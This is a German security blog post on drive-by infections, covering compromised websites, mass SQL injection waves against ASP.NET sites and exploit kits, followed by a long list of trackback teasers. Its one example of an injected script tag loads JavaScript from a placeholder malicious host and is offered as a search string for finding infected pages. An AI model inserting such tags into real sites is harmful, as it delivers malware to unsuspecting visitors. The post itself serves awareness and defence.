Skip to content

Drive-by-Infektionen - Gefahren drohen überall

Drive-by-Infektionen sind die zur Zeit wohl größte Bedrohung im Web: In eigentlich vertrauenswürdige Websites eingeschleuste iframes oder script-Tags versuchen, auf den Rechnern der Besucher Schadsoftware einzuschleusen. Und auch außerhalb des Webs lauert diese Gefahr: Cyberkriminelle können ihre Opfer über E-Mails auf präparierte Seiten locken, wie es z.B. im Rahmen der "Operation Aurora" genannten gezielten Angriffe auf Google und andere Unternehmen eindrucksvoll vorgeführt wurde. Und Sophos berichtet über Spam-Mails, deren HTML-Anhänge außer dem Spam zusätzlich einen unsichtbaren iframe zum Einschleusen von Schadcode enthalten.

Der klassische Fall: Kompromittierte Websites

Im klassischen Fall der kompromittierten Websites erfolgt der Angriff in zwei Schritten: Zuerst wird eine normalerweise vertrauenswürdige Webseite so manipuliert, das sie bösartigen JavaScript-Code enthält. Danach wird von diesem JavaScript-Code in einem oder mehreren Schritten der eigentliche Schadcode auf dem Rechner des ahnungslosen Besuchers eingeschleust. Für diese Angriffe hat sich der Begriff Drive-by-Download oder Drive-by-Infektion eingebürgert, wobei ich den zweiten für passender halte - Drive-by-Download klingt zu harmlos.

Die Installation des Schadcodes erfolgt ohne Zutun des Benutzers, der i.A. nicht einmal bemerkt, was da gerade passiert. In einem script-Tag oder über einen iframe wird ein JavaScript-Skript eingebunden, das dann versucht, über eine mehr oder weniger großer Anzahl an Exploits zur Ausnutzung aktueller und auch älterer Schwachstellen den Schadcode einzuschleusen. Ist dieser erste Schadcode, der sog. Downloader, auf dem Rechner installiert, lädt er weiteren Code nach, der verschiedenen Zwecken dienen kann. Vom Ausspähen von Zugangsdaten bis zur Integration des Rechners in ein Botnet ist dann alles möglich. Manche Schädlinge laden bei Bedarf auch weiteren Code nach, so dass ein ausspionierter Rechner anschließend noch als Teil eines Botnets dienen kann.

Das erste Opfer: Der Webserver

Im Juni 2010 liefen laut Sucuri Security mindestens zwei groß angelegte SQL-Injection-Angriffe auf ASP.NET-Websites, die Code für Drive-by-Infektionen einschleusten. Das ist eigentlich nichts Neues, das gab es genau so auch schon 2008. Die SQL-Injection-Angriffe nutzen keine Schwachstellen in bestimmten Anwendungen oder Erweiterungen aus, sondern sind allgemein gegen alle ASP-Anwendungen gerichtet. Gibt es darin eine SQL-Injection-Schwachstelle, fällt sie dem Angriff zum Opfer. Sophos hat am 4. Juli über eine mögliche weitere Welle von SQL-Injection-Angriffen berichtet.

Der Klassiker: SQL-Injection

Die SQL-Injection-Angriffe folgen meist einem einheitlichen Muster: Alle geeigneten Datenbankfelder werden mit iframes oder script-Tags zum Nachladen von Schadcode gefüllt, in der Hoffnung, dass mindestens eines der Felder ohne weitere Prüfung oder Bearbeitung ausgegeben wird. Dabei werden Systemtabellen und z.B. rein numerische Felder ignoriert und nur die einem normalen Benutzer gehörenden Tabellen und darin die Felder mit Textwerten etc. manipuliert. Werden die Werte daraus dann später unverändert an die Besucher der Website ausgegeben, wird der eingeschleuste Code im Webbrowser der Benutzer ausgeführt und JavaScript-Schadcode zum Ausnutzen verschiedener Schwachstellen nachgeladen.

Wie viele Websites ungefähr Opfer einer Angriffswelle geworden sind, verraten die Suchmaschinen: Da der iframe oder script-Tag in alle passenden Felder eingeschleust wird, sind regelmäßig auch welche dabei, die an Stellen ausgegeben werden, an denen diese Tags laut HTML-Standard nicht vorgesehen sind und daher auch nicht ausgewertet werden, z.B. innerhalb des title-Tags. Sucht man nach dem eingeschleusten Code, z.B.

<script src=http://www.boeser-server.example/pfad/zum/skript.js></script>

werden die Seiten mit dem entsprechenden iframe oder script-Tag ausgegeben.

Es gibt mehrere Tools, sog. Exploit-Kits, die von den Cyberkriminellen zur Vorbereitung und Durchführung derartiger Angriffe genutzt werden können. Dabei können sowohl die anzuwendenden Exploits als auch die anzugreifenden Websites komfortabel ausgewählt und die Angriffe konfiguriert werden. Danach muss der Kriminelle nur noch darauf warten, dass die verteilte Schadsoftware sich mit seinem Server verbindet. Die Manipulation der harmlosen Websites und die Angriffe auf deren Besucher laufen automatisch ab.

In der nächsten Folge werde ich einen SQL-Injection-Angriff zum Einschleusen eines iframes oder script-Tags genauer beschreiben.

Carsten Eilers


Übersicht über alle Artikel zum Thema

Drive-by-Infektionen - Gefahren drohen überall
Drive-by-Infektionen durch SQL-Injection vorbereitet
Drive-by-Infektionen: So kommt der Schadcode auf den Server
Drive-by-Infektionen - Vom Server auf den Client
Drive-by-Infektionen - Ein Blick auf die Exploits
Drive-by-Infektionen erkennen und abwehren
LizaMoon - Massenhack mit minimalen Folgen
Aktuelles: LizaMoon auf Apples iTunes-Seiten
Drive-by-Infektionen über präparierte Werbung

Trackbacks

Dipl.-Inform. Carsten Eilers am : Phishing mit Tabs: Tabnabbing

"Phishing mit Tabs: Tabnabbing" vollständig lesen
Einen neuen Phishing-Ansatz hat Aza Raskin, der 'Creative Lead' für Firefox, beschrieben: Indem der Titel, der Inhalt und das Favicon eines gerade nicht im Fokus liegenden Browser-Tabs geändert werden, kann dem Benutzer darin eine vertra

Dipl.-Inform. Carsten Eilers am : Angst einflößende Schadsoftware: Scareware

"Angst einflößende Schadsoftware: Scareware" vollständig lesen
Schadsoftware, englisch "Malware", gibt es für viele verschiedene Zwecke. In diesen und den folgenden Texten geht es auf eine kleine Rundreise durch die Welt der Schadsoftware. Den Anfang macht die sog. "Scareware": Schadsoftware, die zwar vie

Dipl.-Inform. Carsten Eilers am : 10 Tage, 4 0-Day-Schwachstellen - Cyberkriminelle in Jahresendpanik?

"10 Tage, 4 0-Day-Schwachstellen - Cyberkriminelle in Jahresendpanik?" vollständig lesen
Zwischen dem 26. Oktober und 4. November wurden 4 0-Day-Exploits entdeckt. Eine der Schwachstellen wurde bereits vollständig und eine in der bisher nicht angegriffenen Komponente behoben. Wenn das so weiter geht, wird es ein ziemlicher hei&s

Dipl.-Inform. Carsten Eilers am : 2010 - Ein Rückblick auf ein ereignisreiches Jahr

"2010 - Ein Rückblick auf ein ereignisreiches Jahr" vollständig lesen
2010 war ein gerade aus Sicht der IT-Sicherheit ereignisreiches Jahr. 2011 kann es gerne ruhiger zugehen, aber vermutlich gilt wie immer die Regel von Bernd dem Brot: "Alles ist wie immer, nur schlimmer! Einige Beispiele: So hat z.B. das Bund

Dipl.-Inform. Carsten Eilers am : Gezielter Angriff auf RSA mit unabsehbaren Folgen

"Gezielter Angriff auf RSA mit unabsehbaren Folgen" vollständig lesen
Mitte März meldete RSA einen gezielten Angriff, bei dem nicht näher beschriebene Daten ausgespäht wurden. Darunter befanden sich auch Informationen über die SecurID-Token zur Zwei-Faktor-Authentifizierung. Ebenfalls Mitte M&aum

Dipl.-Inform. Carsten Eilers am : Die Rückkehr des Exploit-Thursday

"Die Rückkehr des Exploit-Thursday" vollständig lesen
Microsoft veröffentlicht am Dienstag seine Patches, und die Cyberkriminellen am Mittwoch oder Donnerstag die Exploits für die soeben behobenen Schwachstellen - vor einigen Jahren war das fast üblich. Jetzt ist es wohl wieder soweit

Dipl.-Inform. Carsten Eilers am : Warum Sie ihre Website auf Schwachstellen testen sollten

"Warum Sie ihre Website auf Schwachstellen testen sollten" vollständig lesen
Ist Ihre Website sicher? Sind Sie sich da wirklich ganz sicher? Wenn nicht, ist jetzt eine gute Gelegenheit, Server und Anwendungen auf Schwachstellen zu testen. Bevor es andere tun und Sie womöglich erst aus der Presse erfahren, dass Ihre ei

Dipl.-Inform. Carsten Eilers am : iPhone Jailbreak - Gut gemeint ist nicht immer gut gemacht

"iPhone Jailbreak - Gut gemeint ist nicht immer gut gemacht" vollständig lesen
Für gut eine Woche waren alle iPhone-Besitzer der akuten Gefahr einer Drive-by-Infektion durch Ausnutzung mehrerer 0-Day-Schwachstellen ausgesetzt - und dass nur, damit einige iPhone-Besitzer (und die von anderen iOS-Geräten) ihr Ger&aum

Dipl.-Inform. Carsten Eilers am : Likejacking - Facebook im Visier der Cyberkriminellen

"Likejacking - Facebook im Visier der Cyberkriminellen" vollständig lesen
Vor etwas mehr als einem Jahr wurde festgestellt, dass Facebooks Like-Button zum Clickjacking geradezu auffordert. Diese speziellen Angriffe wurden "Likejacking" getauft, und in der Zwischenzeit gab es eine Vielzahl davon. Likejacking - Cybe

Dipl.-Inform. Carsten Eilers am : Onlinebanking: Cyberkriminelle reagieren auf Chip- und SMS-TAN

"Onlinebanking: Cyberkriminelle reagieren auf Chip- und SMS-TAN" vollständig lesen
Cyberkriminelle und Banken liefern sich zur Zeit wohl ein Rennen wie Hase und Igel. Die Frage ist nur, wer Hase und wer Igel ist und ob der Hase am Ende wirklich tot umfällt. TAN-Listen tot, SMS-TAN angeschlagen Die herkömmliche

Dipl.-Inform. Carsten Eilers am : Die smsTAN ist tot, der SMS-Dieb schon da!

"Die smsTAN ist tot, der SMS-Dieb schon da!" vollständig lesen
Die Banken schaffen die iTAN ab, weil es (zu viele) Kunden gibt, die das Opfer von Man-in-the-Browser-Angriffen werden oder auf Phisher hereinfallen. Möchte jemand wetten, dass genau diese Kunden sich nicht stattdessen genauso einfach einen Sma

Dipl.-Inform. Carsten Eilers am : Digitale Schutzimpfung

"Digitale Schutzimpfung" vollständig lesen
Heise Security hat festgestellt, dass einige Virenscanner bei der Erkennung eines minimal manipulierten Staatstrojaners versagen und die Erkennungsleistung auch sonst zu wünschen übrig lässt. Wundert das irgend jemanden? Virensc

Dipl.-Inform. Carsten Eilers am : Clickjacking gegen Flash, urchin.js und Duqu - nichts als Wiederholungen!

"Clickjacking gegen Flash, urchin.js und Duqu - nichts als Wiederholungen!" vollständig lesen
Wiederholungen, nichts als Wiederholungen. Nein, ich meine nicht das TV-Programm im Sommer(loch). Auch die Cyberkriminellen haben in letzter Zeit auf Bewährtes gesetzt: Clickjacking gegen Flash, Massen-SQL-Injection und Code-Recycling sind ang

Dipl.-Inform. Carsten Eilers am : Wie gefährlich ist die Duqu-0-Day-Schwachstelle?

"Wie gefährlich ist die Duqu-0-Day-Schwachstelle?" vollständig lesen
Microsoft hat ein Security Advisory zur von Duqu ausgenutzten 0-Day-Schwachstelle im Kernel veröffentlicht. Gefährliche oder weniger gefährliche Schwachstelle? Die Schwachstelle mit der CVE-ID CVE-2011-3402 befindet sich i

Dipl.-Inform. Carsten Eilers am : Lilupophilupop - Eine SQL-Injection-Welle ist unterwegs

"Lilupophilupop - Eine SQL-Injection-Welle ist unterwegs" vollständig lesen
SQL-Injection-Angriffe auf ASP-Websites gibt es eigentlich ständig, meist ohne dass sie besondere Aufmerksamkeit erregen. Von Zeit zu Zeit gibt es auch größere Wellen, wie z.B. LizaMoon im Frühjahr 2011. Auch im Herbst 2011

Dipl.-Inform. Carsten Eilers am : "DNS-Changer" - welcher DNS-Changer ist gemeint?

""DNS-Changer" - welcher DNS-Changer ist gemeint?" vollständig lesen
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) empfiehlt allen Internetnutzern, ihre Rechner auf eine Infektion mit der Schadsoftware "DNS-Changer" zu überprüfen und nennt auch eine Website, auf der das online erledigt

Dipl.-Inform. Carsten Eilers am : Exploit-Kit über Wordpress Version 3.2.1 verbreitet

"Exploit-Kit über Wordpress Version 3.2.1 verbreitet" vollständig lesen
Zwei Berichten zu Folge wird (relativ) massiv über kompromittierte Wordpress-3.2.1-Installationen ein Exploit-Kit verbreitet. Darüber, wie die Wordpress-Installationen kompromittiert werden, herrscht Unklarheit. Zumindest gibt es zwei E

www.supernature-forum.de am : PingBack

"PingBack" vollständig lesen

Dipl.-Inform. Carsten Eilers am : CeBIT 2012 - Alles wird gut!

"CeBIT 2012 - Alles wird gut!" vollständig lesen
Das Motto der CeBIT 2012: Managing Trust. Na, dann wird ja alles ganz sicher. Vor allem in der Cloud - man muss nur Vertrauen haben! Was stören einen dann schon mögliche Angriffe oder Schwachstellen? Oder der mögliche Zugriff durch

Dipl.-Inform. Carsten Eilers am : Macs im Visier

"Macs im Visier" vollständig lesen
Mac OS X wird immer beliebter. Auch bei den Cyberkriminellen. Und dann gibt es da wohl auch noch mindestens einen Staat, der es auf Mac-Benutzer abgesehen hat. Aber fangen wir mit den normalen Cyberkriminellen an. Flashback - Erstinfektion ohn

Dipl.-Inform. Carsten Eilers am : Zeus, Carberp und Khelios - Drei Schläge gegen Botnets

"Zeus, Carberp und Khelios - Drei Schläge gegen Botnets" vollständig lesen
Es ist mal wieder Zeit, einen Blick auf die verschiedenen Botnets zu werfen. Denen geht es zur Zeit an den Kragen. Zumindest einigen, und zumindest teilweise. Microsoft gegen Zeus-Botnets Microsofts "Digital Crimes Unit" hat gemeinsam mit

Dipl.-Inform. Carsten Eilers am : Das Flashback-Botnet und Apples Langsamkeit

"Das Flashback-Botnet und Apples Langsamkeit" vollständig lesen
Der Mac wird bei den Cyberkriminellen immer beliebter, und inzwischen haben sie ca. 1% aller Macs in einem Botnet versammelt. Wirklich? Und was macht Apple dagegen? Das Flashback-Botnet - 550.000, 600.000, wer bietet mehr? Es gibt ein r

Dipl.-Inform. Carsten Eilers am : "Für den Mac gibt es keine Viren"? - Weg mit den Mythen!

""Für den Mac gibt es keine Viren"? - Weg mit den Mythen!" vollständig lesen
Es ist an der Zeit, mal mit einige Mythen rund um den Mac, Schadsoftware und das Flashback-Botnet aufzuräumen. Wenn man sich die verschiedenen Mac-Foren ansieht, liest man immer wieder die gleichen, falschen Aussagen. Da ich weder Lust noch Zei

Dipl.-Inform. Carsten Eilers am : Ein bekannter Advanced Persistent Threat: Operation Aurora

"Ein bekannter Advanced Persistent Threat: Operation Aurora" vollständig lesen
Nachdem geklärt ist, was ein APT ist, wollen wir jetzt einen Blick auf den Ablauf so eines Angriffs richten. Als erstes Beispiel dient der Angriff, der den Begriff "Advanced Persistent Threat" im Januar 2010 bekannt gemacht hat: Operation

Dipl.-Inform. Carsten Eilers am : Neues zu Flashback & Co. und WordPress

"Neues zu Flashback & Co. und WordPress" vollständig lesen
Es gibt noch ein paar Neuigkeiten zu Flashback und anderen, die gleiche Schwachstelle ausnutzenden Schädlingen. Und wussten Sie schon, dass Flashback über WordPress-Installationen verbreitet wurde und noch wird? Abweichungen bei der

Dipl.-Inform. Carsten Eilers am : Macs und Schadsoftware, in allen möglichen Varianten

"Macs und Schadsoftware, in allen möglichen Varianten" vollständig lesen
Heute gibt es mal wieder ein Sammelsurium an Kommentaren zu verschiedenen Themen, die aber alle eins miteinander verbindet: Sie haben etwas mit Schadsoftware auf dem Mac zu tun, zumindest indirekt. Windows-Schädlinge auf Macs Sophos b

Dipl.-Inform. Carsten Eilers am : Reaktionen

"Reaktionen" vollständig lesen
Heute geht es um verschiedene Reaktionen, die aber alle in der einen oder anderen Form etwas mit IT-Sicherheit zu tun haben. Hase und Igel bei Drive-by-Infektion Am 23. April wurde ich auf eine neue Drive-by-Infektion aufmerksam gemacht un

Dipl.-Inform. Carsten Eilers am : Kann man Advanced Persistent Threats erkennen?

"Kann man Advanced Persistent Threats erkennen?" vollständig lesen
Die "Operation Aurora", Stuxnet und der Angriff auf RSA - drei bekannte Advanced Persistent Threats und zwei entscheidende Fragen: Kann man solche Angriffe erkennen, und wenn ja: Wie? Der eigentliche Angriff Fangen wir mit dem eigentlic

Dipl.-Inform. Carsten Eilers am : Kommentare zu SQL-Injection-Massenhacks, Drive-by-Infektionen und Exploit-Kits

"Kommentare zu SQL-Injection-Massenhacks, Drive-by-Infektionen und Exploit-Kits" vollständig lesen
Man nehme einige SQL-Injection-Massenhacks, eine Prise Drive-by-Infektionen und zwei Exploit-Kits, würze mit einigen Kommentaren, rühre gut um - und schon ist dieser Standpunkt fertig. Lizamoon weiterhin aktiv Vor etwas mehr als

Dipl.-Inform. Carsten Eilers am : Ungewöhnlich: Drive-by-Infektionen über 0-Day-Exploits

"Ungewöhnlich: Drive-by-Infektionen über 0-Day-Exploits" vollständig lesen
Zur Zeit laufen Angriffe über zwei Schwachstellen in Microsoft-Programmen, die beide die Ausführung von eingeschleustem Code erlauben: Eine 0-Day-Schwachstelle in den XML Core Services und eine am Juni-Patchday gepatchte Schwachstelle im In

Dipl.-Inform. Carsten Eilers am : Advanced Persistent Threats gegen tibetische Aktivisten und mehr

"Advanced Persistent Threats gegen tibetische Aktivisten und mehr" vollständig lesen
Zum Abschluss des Themas Advanced Persistent Threats gibt es in dieser Folge noch ein paar Informationen, die in die anderen Texte nicht passten oder nach deren Veröffentlichung erschienen sind. Als Beispiel dafür, dass nicht nur Unterneh

Dipl.-Inform. Carsten Eilers am : Google Hacking - The Next Generation

"Google Hacking - The Next Generation" vollständig lesen
Was Google Hacking ist, haben Sie in der vorherigen Folge erfahren, in der auch erste Beispiele und die wichtigsten Google-Optionen vorgestellt wurden. Schon damit kann man viele interessante Informationen sammeln, aber mit entsprechenden Anpassu

Dipl.-Inform. Carsten Eilers am : SQL-Injection im Schnelldurchlauf

"SQL-Injection im Schnelldurchlauf" vollständig lesen
Laut dem Cloud-Hosting-Anbieter FireHost ist die Zahl der erkannten SQL-Injection-Angriffe zwischen April und Juni 2012 um 69% gestiegen. Während im 1. Quartal 2012 "nur" 277.770 Angriffe abgewehrt wurden, waren es im 2. Quartal 469.983 Angr

Dipl.-Inform. Carsten Eilers am : Kommentare zu diesem und jenem...

"Kommentare zu diesem und jenem..." vollständig lesen
Auch heute gibt es "nur" Kurzkommentare zu jeder Menge Links. Los geht es mit bösartiger Google-Werbung. Oder wie sonst soll man Anzeigen bezeichnen, die wie ein Download-Button aussehen und auf Download-Seiten eingeblendet werden? Google, yo

Dipl.-Inform. Carsten Eilers am : Angriffe über zwei 0-Day-Schwachstellen in Java

"Angriffe über zwei 0-Day-Schwachstellen in Java" vollständig lesen
Zur Zeit gibt es zwei 0-Day-Schwachstellen in Java, ein Exploit befindet sich bereits im Exploit-Kit "Black Hole", und Angriffe darüber wurden auch schon gemeldet. Falls Sie das Java-Plug-In ihres Browsers noch nicht deaktiviert haben, wird

Dipl.-Inform. Carsten Eilers am : Die aktuelle 0-Day-Schwachstelle im Internet Explorer

"Die aktuelle 0-Day-Schwachstelle im Internet Explorer" vollständig lesen
Seit einigen Tagen wird eine 0-Day-Schwachstelle im Internet Explorer im Rahmen von Drive-by-Infektionen ausgenutzt. Microsoft hat soeben die sofortige Veröffentlichung eines FixIt-Tools sowie die Veröffentlichung eines Updates

Dipl.-Inform. Carsten Eilers am : Kommentare zu Flame, einem neuen Wurm, einem auf Java spezialisierten Exploit-Kit und mehr

"Kommentare zu Flame, einem neuen Wurm, einem auf Java spezialisierten Exploit-Kit und mehr" vollständig lesen
Es gibt Neues zu Flame, ein neuer Wurm macht den Nahen Osten unsicher, ein Exploit-Kit scheint sich auf Java zu spezialisieren, und ein Rootkit verbreitet Drive-by-Infektionen. Das ist doch ein paar Kommentare wert. Neues zu Flame Sie erinn

Dipl.-Inform. Carsten Eilers am : Eurograbber beweist: mTANs gefährden Ihr Bankkonto!

"Eurograbber beweist: mTANs gefährden Ihr Bankkonto!" vollständig lesen
Eran Kalige von Versafe und Darrell Burkey von Check Point Software Technologies haben eine Fallstudie zu einem groß angelegten Angriff auf Onlinebanking-Nutzer veröffentlicht: "A Case Study of Eurograbber: How 36 Million Euros was Stolen

Dipl.-Inform. Carsten Eilers am : HTML5 Security - postMessage() sicher nutzen

"HTML5 Security - postMessage() sicher nutzen" vollständig lesen
Wie bereits erwähnt lehnt sich diese kleine Serie zur Sicherheit von HTML5 an meinen Vortrag auf der WebTech Conference 2012 an. Womit auch schon das aktuelle Thema vorgegeben ist: Die mit HTML5 eingeführte Methode postMessage().

Dipl.-Inform. Carsten Eilers am : 0-Day-Schwachstelle im Internet Explorer, Ausgabe Dezember 2012

"0-Day-Schwachstelle im Internet Explorer, Ausgabe Dezember 2012" vollständig lesen
Ende Dezember wurden Angriffe über eine neue 0-Day-Schwachstelle im Internet Explorer entdeckt. Und die hat es ebenso wie die Angriffe selbst in sich. Erste Angriffe am 27. 21. 7 Dezember 2012 Laut Symantec und FireEye konnten die er

Dipl.-Inform. Carsten Eilers am : Drucksache: Windows.Developer 2.2013 - SQL Injection

"Drucksache: Windows.Developer 2.2013 - SQL Injection" vollständig lesen
In der neuen Kategorie "Drucksache" werde ich in Zukunft auf Texte von mir hinweisen, die in Magazinen etc. erschienen sind. Los geht es mit der Windows.Developer Ausgabe 2.2013. Darin ist ein Artikel über SQL Injection (nicht nur) in

Dipl.-Inform. Carsten Eilers am : Drucksache: PHP Magazin 2.2013 - Drive-by-Infektionen

"Drucksache: PHP Magazin 2.2013 - Drive-by-Infektionen" vollständig lesen
Mein Artikel im PHP Magazin 2.2013 beschäftigt sich mit den auch hier im Blog schon behandelten Drive-by-Infektionen. Da der Artikel im PHP Magazin erschienen ist, liegt der Schwerpunkt natürlich auf PHP. Konkret erkläre ich am B

Dipl.-Inform. Carsten Eilers am : Java 0-Day-Schwachstelle nach 3 Tagen behoben

"Java 0-Day-Schwachstelle nach 3 Tagen behoben" vollständig lesen
Es gibt mal wieder eine 0-Day-Schwachstelle in Java. Oder besser: Es gab sie. Denn sie wurde von Oracle bereits geschlossen - nach nur 3 Tagen! Kommen wir also zu einem Drama in 4 AktenTagen: 10. Januar: Exploit "in the wild" und vielen Ex

Dipl.-Inform. Carsten Eilers am : Pwn2Own: Safari ignoriert, alles andere gehackt

"Pwn2Own: Safari ignoriert, alles andere gehackt" vollständig lesen
Beim diesjährigen Pwn2Own-Wettbewerb auf der Sicherheitskonferenz CanSecWest wurde mit Ausnahme von Apples Safari alles gehackt, was zur Verfügung stand. Und ob Safari nun allen Angriffen widerstanden hat oder ob niemand Lust hatte, s

Dipl.-Inform. Carsten Eilers am : Schwachstelle in Mac OS X erlaubte Java-Angriffe ohne Java-Plug-In

"Schwachstelle in Mac OS X erlaubte Java-Angriffe ohne Java-Plug-In" vollständig lesen
Java im Browser ist gefährlich. Darum sollte man es ausschalten, wenn man es nicht braucht. Denn was nicht aus dem Browser heraus erreichbar ist, kann auch nicht über eine Drive-by-Infektion angegriffen werden. Im Fall von Mac OS X

Dipl.-Inform. Carsten Eilers am : Drucksache: Windows.Developer 4.2013 - Wie sicher ist das Tablet?

"Drucksache: Windows.Developer 4.2013 - Wie sicher ist das Tablet?" vollständig lesen
Im Windows.Developer 4.2013 ist ein Artikel über die Sicherheit von Tablets erschienen. Vorgestellt werden die bisher bekannten theoretischen und praktischen Angriffe. Bisher gibt es von beiden zwar erst wenige, aber da die Tablets immer mehr

Dipl.-Inform. Carsten Eilers am : Kommentare zu PostgreSQL, Ad-Blockern, AT&T Passwortregeln und mehr

"Kommentare zu PostgreSQL, Ad-Blockern, AT&T Passwortregeln und mehr" vollständig lesen
Die Themen heute: PostgreSQL ergreift vor der Veröffentlichung eines Sicherheitsupdates eine zweifelhafte Schutzmaßnahme, Ad-Blocker können vor Drive-by-Infektionen schützen, und AT&T verwendet unsichere Passwortregeln. Au&s

Dipl.-Inform. Carsten Eilers am : Code Signing - Auch Schadsoftware kann signiert sein

"Code Signing - Auch Schadsoftware kann signiert sein" vollständig lesen
Oracles Antwort auf Javas ständige Sicherheitsprobleme: Der Einsatz von Code Signing. Vorerst gibt es nur mehr oder weniger ausführliche Warnungen vor nicht oder falsch signierten Applets, irgendwann sollen dann nur noch signierte Apple

Dipl.-Inform. Carsten Eilers am : Kommentare rund um Schadsoftware, SSL und Googles Glass

"Kommentare rund um Schadsoftware, SSL und Googles Glass" vollständig lesen
Heute gibt es mal wieder nur ein paar kommentierte Lesetipps: Zu Schadsofware, zu SSL und zu Googles Glass, Datenschutz und Privatsphäre Googles Glass wirft viele Fragen auf, zum Beispiel wie es mit dem Datenschutz der damit Beobach

Dipl.-Inform. Carsten Eilers am : Was haben Flame, gepackte Windows-Systemdateien und die "Operation Aurora" gemeinsam?

"Was haben Flame, gepackte Windows-Systemdateien und die "Operation Aurora" gemeinsam?" vollständig lesen
Bei allen dreien handelt es sich um Schädlinge - echte und angebliche. Vor einem Jahr wurde Flame entdeckt - mit anfangs viel Rauch um fast nichts. Rauch erzeugen, das können Antivirenhersteller gut - zum Beispiel, wenn ihre Scanner gepack

Dipl.-Inform. Carsten Eilers am : Microsoft aktualisiert Security Bulletin: Erneut 0-Day-Schwachstelle im IE

"Microsoft aktualisiert Security Bulletin: Erneut 0-Day-Schwachstelle im IE" vollständig lesen
Microsoft hat das am 9. Juli veröffentlichte Security Bulletin MS13-055 für den Internet Explorer aktualisiert: Die Schwachstelle CVE-2013-3163 wird im Rahmen gezielter Angriffe ausgenutzt, betroffen ist konkret der IE 8. Wir haben es a

Dipl.-Inform. Carsten Eilers am : Schutzmaßnahmen: Content Security Policy gegen XSS, Teil 3

"Schutzmaßnahmen: Content Security Policy gegen XSS, Teil 3" vollständig lesen
Nach der allgemeinen Einführung in die Content Security Policy und dem Überblick über die Anweisungen geht es in dieser Folge zuerst um die Schlüsselwörter, die von der CSP erkannt werden. Die Quelle (des Gutem, in

Dipl.-Inform. Carsten Eilers am : Ein paar kommentierte Links zum Wochenanfang

"Ein paar kommentierte Links zum Wochenanfang" vollständig lesen
Heute gibt mal wieder "nur" ein paar mehr oder weniger kommentierte Links statt eines "Standpunkts" zu einem Thema. Los geht es mit einem Text von Paul Ducklin von Sophos: "Anatomy of a brute force attack - how important is password complexity?".

Dipl.-Inform. Carsten Eilers am : 0-Day-Schwachstelle im Internet Explorer, die dritte

"0-Day-Schwachstelle im Internet Explorer, die dritte" vollständig lesen
Es gibt schon wieder eine 0-Day-Schwachstelle im Internet Explorer. Insgesamt die 15. in diesem Jahr, und die dritte im Internet Explorer (und dann gab es da ja auch noch die Ende Dezember 2012 im IE gemeldete, die es fast in dieses Jahr geschaff

Dipl.-Inform. Carsten Eilers am : IE: Ein 0-Day-Exploit für zwei Angriffe?

"IE: Ein 0-Day-Exploit für zwei Angriffe?" vollständig lesen
Es gibt neue Informationen zur aktuellen 0-Day-Schwachstelle im Internet Explorer. Nein, nicht zu der, für die Microsoft Mitte September eine FixIt-Tool veröffentlicht hat (CVE-2013-3893), sondern für die, die am Oktober-Patchday

Dipl.-Inform. Carsten Eilers am : php.net war für Drive-by-Infektionen präpariert

"php.net war für Drive-by-Infektionen präpariert" vollständig lesen
Am Donnerstag stufte Google php.net als bösartige Website ein. Was zuerst wie ein Fehlalarm, also ein False Positive, aussah, entpuppte sich später als tatsächliche Kompromittierung, es wurde Code für Drive-by-Infektionen

Dipl.-Inform. Carsten Eilers am : 0-Day-Schwachstelle in Microsoft Graphics betrifft Office und Windows

"0-Day-Schwachstelle in Microsoft Graphics betrifft Office und Windows" vollständig lesen
Es gibt mal wieder eine 0-Day-Schwachstelle. Sie befindet sich in Microsoft Graphics und betrifft Windows (Vista und Server 2008, Microsoft Office und Lync. Es handelt sich um die 17. 0-Day-Schwachstelle in diesem Jahr. Wie (mit einer Ausnahme)

Dipl.-Inform. Carsten Eilers am : 0-Day-Exploit für Internet Explorer entdeckt

"0-Day-Exploit für Internet Explorer entdeckt" vollständig lesen
FireEye hat einen 0-Day-Exploit für den Internet Explorer entdeckt. Der im Rahmen einer Drive-by-Infektion eingesetzte Exploit kombiniert ein Informationsleck und einen "out-of-bounds memory access" zur Ausführung eingeschleusten Schadco

Dipl.-Inform. Carsten Eilers am : Kommentare zu neuen Angriffen über die 0-Day-Schwachstelle in MS Graphics und mehr

"Kommentare zu neuen Angriffen über die 0-Day-Schwachstelle in MS Graphics und mehr" vollständig lesen
Eine weitere Angreifer-Gruppe nutzt die 0-Day-Schwachstelle in MS Graphics, es gibt einen neuen 0-Day-Exploit für die japanische Textverarbeitung Ichitaro, und ein chinesischer Schädling ändert über AutoCAD die Startseite des Webb

Dipl.-Inform. Carsten Eilers am : Die 0-Day-Schwachstelle in Windows XP oder Microsofts Workaround - was ist gefährlicher?

"Die 0-Day-Schwachstelle in Windows XP oder Microsofts Workaround - was ist gefährlicher?" vollständig lesen
Es gibt mal wieder eine 0-Day-Schwachstelle, diesmal in Windows XP und Server 2003. Im Vergleich zu den 0-Day-Exploits die bisher aufgetaucht sind, ist die aber relativ Harmlos: Sie erlaubt "nur" das Erlangen von Admin-Rechten und wird in Verbindu

Dipl.-Inform. Carsten Eilers am : Der 0-Day-Patchday am 10.12.2013: 4x Microsoft, 1x Adobe

"Der 0-Day-Patchday am 10.12.2013: 4x Microsoft, 1x Adobe" vollständig lesen
Wie angekündigt hat Microsoft am Dezember-Patchday am 10.12. einen Patch für die 0-Day-Schwachstelle in MS Graphics veröffentlicht. Außerdem wurden von Microsoft drei weitere 0-Day-Schwachstellen behoben, die bisher nicht &ou

Dipl.-Inform. Carsten Eilers am : 2013 - Das Jahr der 0-Day-Exploits

"2013 - Das Jahr der 0-Day-Exploits" vollständig lesen
Das Jahr ist bald vorbei, in einer Woche ist Weihnachten, in zwei Wochen ist Sylvester. Wenn nichts dazwischen kommt (also diese Woche nicht zum Beispiel ein weiterer 0-Day-Exploit auftaucht) wird dies der letzte "Standpunkt" für 2013 sein. Da

Dipl.-Inform. Carsten Eilers am : Drucksache: PHP Magazin 2.2014 - Angriffsziel Webbrowser

"Drucksache: PHP Magazin 2.2014 - Angriffsziel Webbrowser" vollständig lesen
Im PHP Magazin 2.2014 ist ein Artikel über den aktuellen Stand der Sicherheit von HTML5 und JavaScript erschienen. Im PHP Magazin 3 und 4/2012 wurden zuletzt Artikel über die Sicherheit von HTML5 veröffentlicht. Da drängt s

Dipl.-Inform. Carsten Eilers am : Es ist da: Mein Buch "iOS Security - Sichere Apps für iPhone und iPad"

"Es ist da: Mein Buch "iOS Security - Sichere Apps für iPhone und iPad"" vollständig lesen
Ich habe gestern die Belegexemplare meines neuen Buchs "iOS Security - Sichere Apps für iPhone und iPad" bekommen, ab sofort ist es auch im Buchhandel erhältlich (sowohl gedruckt als auch als eBook). Den Inhalt kenne ich ja schon etwas l&

